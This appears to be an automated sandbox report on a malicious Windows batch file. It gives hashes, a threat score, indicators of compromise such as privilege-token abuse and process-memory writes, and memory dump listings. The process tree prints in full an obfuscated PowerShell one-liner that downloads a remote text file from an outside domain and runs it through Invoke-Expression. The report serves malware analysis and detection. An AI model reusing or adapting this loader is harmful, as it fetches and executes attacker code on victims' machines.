68d81cc60a1f99e45561f2c68cdc955c5601942032444234458018a541c482e7

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
20-02-2024 05:43

Target

68d81cc60a1f99e45561f2c68cdc955c5601942032444234458018a541c482e7.bat
Size

759B
MD5

97ba5c35c67fbb4979b3ae73d05d6005
SHA1

b854decd7517bb5162d3a4d1a5da86d9fc6189f9
SHA256

68d81cc60a1f99e45561f2c68cdc955c5601942032444234458018a541c482e7
SHA512

55b20b55562de161ddfdf8b8e3fa0244201ae04c166700502c72fe94950580ee06a37723293e901274d2b0c28dddfd40c2f06c83f39763eeab285f55506bbeb8

Score

8^/10

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	2936	powershell.exe
7	2936	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2936	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeIncreaseQuotaPrivilege	2936	powershell.exe
Token: SeSecurityPrivilege	2936	powershell.exe
Token: SeTakeOwnershipPrivilege	2936	powershell.exe
Token: SeLoadDriverPrivilege	2936	powershell.exe
Token: SeSystemProfilePrivilege	2936	powershell.exe
Token: SeSystemtimePrivilege	2936	powershell.exe
Token: SeProfSingleProcessPrivilege	2936	powershell.exe
Token: SeIncBasePriorityPrivilege	2936	powershell.exe
Token: SeCreatePagefilePrivilege	2936	powershell.exe
Token: SeBackupPrivilege	2936	powershell.exe
Token: SeRestorePrivilege	2936	powershell.exe
Token: SeShutdownPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeSystemEnvironmentPrivilege	2936	powershell.exe
Token: SeRemoteShutdownPrivilege	2936	powershell.exe
Token: SeUndockPrivilege	2936	powershell.exe
Token: SeManageVolumePrivilege	2936	powershell.exe
Token: 33	2936	powershell.exe
Token: 34	2936	powershell.exe
Token: 35	2936	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 2936	2908	cmd.exe	29
PID 2908 wrote to memory of 2936	2908	cmd.exe	29
PID 2908 wrote to memory of 2936	2908	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\68d81cc60a1f99e45561f2c68cdc955c5601942032444234458018a541c482e7.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://antuofermo.it/G12.txt';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2936

memory/2936-4-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2936-6-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2936-7-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2936-5-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2936-8-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2936-9-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2936-10-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2936-11-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2936-12-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2936-13-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download